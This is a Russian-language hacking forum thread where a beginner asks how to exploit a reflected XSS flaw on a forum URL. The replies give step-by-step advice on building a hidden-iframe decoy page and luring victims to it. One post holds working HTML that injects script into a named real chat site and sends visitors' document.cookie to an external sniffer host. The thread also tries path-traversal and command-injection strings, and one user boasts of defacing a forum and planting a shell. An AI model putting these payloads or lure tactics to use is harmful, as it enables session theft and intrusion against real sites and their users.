XSS в форуме. Вопросы..
 

Прошу объяснить мне такую вещь.
Есть форум, и там можно в url прописать
http://forum/last.php?do=<script>alert()</script>
и выскакивает alert. Прбовал ../../../etc/passwd
неработает, пробовал еще
http://forum/last.php?do=test; ls -al
тоже не работает. Вставлял ссылку на другой сайт
http://forum/last.php?do=http://site/shell.php?c=pwd
Страница не загружается и в строке состояния пишется done. Подскажите что можно еще делать, или мож я что-то не правильно сделал.

Пассивная XSS. Т.е. надо создать липовую фреймовую страничку и всех туда заманивать. В невидимом фрейме будет происходить отсылка кук вошедших к тебе на снифер.
Но надо проверять - что храниться в куках, дадут ли они что-нить тебе (смотря какой форум) и вообще - получиться или нет.

p.s. правильней ;ls -la
Т.е. -al не правильно

а есть где нить статьи по этому, а то я не особо понял.

а чего понимать то...пассивная хсс , надо чтобы жертва набрала это в урл своего браузера а он(а) этого не будет делать, уверяю)) хотя если ты в СИ разбираешься...

Короче делай свою страницу и чтоб никто не видел, в отдельном фрейме юзай то что у тебя есть... а потом ставь ссылку на нее) говори, мол, супер-линк)

В чем разница ? и так и так - верно

кароче дело геммороем попахивает с этой xss, так?
ну а СИ я плохо владею никогда не увлекался чесанием, хотя уверяют что это круто.

Странный ты человек. Какой помощи ты хочешь коли и информации никакой нет ?

То что ты там сверху описал - это могет быть все что угодно.

http://chat.gala.net/?index.php?"><script>alert()</script>
допустим вот такая бодяга.

точно. это параметры. от перестановки параметров выведенный листинг не поменяется. пасиб.

здесь, по-моему, пассивная xss. php-including не пашет.

чего делаешь - сначала заходишь в чат и проверяешь:
а. что храниться в куках
б. можно ли без ввода пароля сменить настройки юзеру
потом проверяешь - сработает ли алерт если обращение будет идти с другого сайта
потом проверяешь если ты, например в этом алерте, передашь +, то вырежеться он или нет.
потом уже лепишь страничку (смотри мой пост выше) и приглашаешь посетить ее посетителям. А вот что у них будет происходить после посещения - зависит от тебя. Если в куках храниться пас - можешь куки передавать к себе на снифер и сохранять, можешь менять настройки (если это разрешено)

Прикол недавно обнаружили, короче, а история такая:
Сидел я сидел, и чет мне один форум захотелось зафлеймить, взял афторский сплойт, нашел в общем все что нужно, конечно засрал форум, а потом а ирке в общяк бросил пароль с логином, вы бы видели че с форумом делали...и шел залили, и дефейснули(правда потом обратно вернули), но самое главное, у этого domena.victim.ru был доступ www))) короче у нас свой сервант с высокоскоростным каналом, скоро бота на ирк поставим))

Сам то понял, что сказал?

страница своя типа такой должна быть?
Файл 1.html


<IFRAME SRC="2.html" height=0 width=0 frameborder=0 vspace=0 hspace=0></iframe>
<center>
<img src=http://www.xoxma.ru/img/baba.jpg>
</center>

Файл 2.html
<html>
<body>
<script>
navigate("http://chat.gala.net/?index.php?=\" style=\"background:url('javascript:i=new Image()\\;i.src=\\'http://antichat.ru/cgi-bin/s.jpg?\\'%2Bdocument.cookie');");
</script>
</body>
</html>

ЁЁёёё )) Извините что не читал пред. посты, возможно уже все обьяснили...
Чувак, ты пишешь alert(). У тебя браузер (БРАУЗЕР) выполняет этот код.
Откуда у тебя ТВОЙ БРАУЗЕР возьмет /etc/passwd ? Это вообще как понимать)) Ну бывают же вопросы)) /etc/passwd храниться на СЕРВЕРЕ.
Да и что ты получишь выводом /etc/passwd, даже если бы alert() могла читать файлы, и у тебя на диске хранился етс/пассвд (смешно конечно))) ? Много (или не очень) записей юзеров с логином, интерпретатором и т д НО БЕЗ ПАРОЛЯ.

я этим проверял на php инъекцию, думал мож прокатит

Это все фигня =))) мой первый вопрос на форуме хакзоны было: "Как проникнуть на винты ФСБ" =)))

ыыыы )))))))) а мой...зашел на сайт а там индекса не было и содержимое папки было видно, вот и спросил, можно ли с этим поделать что нибудь)))))

киборг, советую почитать статьи по Xss и понять что это за баг.

>>киборг, советую почитать статьи по Xss и понять что это за баг.

ды хрен поймешь, чо там написано. Какие то скули, инклуды, этот баг вроде к ним относиться, да?

Вроде как если xss, то файл можно прочесть явой скрипт, например так
http://forum/last.php?do=<script>alert('/etc/passwd')</script>
но почему то он не показываеться, помоги а?

Вот результат твоего когда.

Мне лично кажется, что ты просто обращаешься к самой странице. Это типа если бы ты сделал

На античате была такая же уязвимость которую нашел Fr1k кажется на главной странице.

Тут твой код выполняется не на самом сервере, а на странице к которой ты обратился. Мне так кажется.

После знака вопроса просто идет индекс файлов. Лист их, а фильтрация отсутствует вот и все.
index.php это файл в который пошлется твоя вводимая информация, которая будет этим файлом обработана.

Хотя тут можно только гадать не посмотревши исходники.

Но так алерта не должно быть и не будет и нет +)))))))

Спроси у Алгола короче да нам расскажи что он скажет.

Нет там надо: http://forum/last.php?do=<script>alert('password_on_microsoft_a dminka_login_biilgates')</script>

Где вы такое старье нарыли!

значит это xss инклуд, мы можем внедрить свой кусок Ява скрипта в тело тсраницы, а как с помощью xss читать файлы на удаленном серваке, через неблокирующие сокеты? я маны читал, но так ничего и не понял. Объясните плиз

Где ты такое прочел